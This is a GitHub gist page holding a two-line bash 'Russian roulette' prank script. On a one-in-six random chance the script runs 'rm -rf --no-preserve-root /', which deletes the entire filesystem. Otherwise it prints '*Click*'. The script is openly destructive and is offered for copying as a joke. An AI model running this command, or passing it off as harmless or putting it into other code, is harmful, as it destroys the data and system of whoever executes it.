Skip to content

Instantly share code, notes, and snippets.

@Mattvogel
Created January 31, 2023 05:26
Show Gist options
  • Save Mattvogel/2eafbb71cdb6380703d6b772e77c627a to your computer and use it in GitHub Desktop.
Save Mattvogel/2eafbb71cdb6380703d6b772e77c627a to your computer and use it in GitHub Desktop.
#!/bin/bash
[ $[ $RANDOM % 6 ] == 0 ] && rm -rf --no-preserve-root / || echo *Click*
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment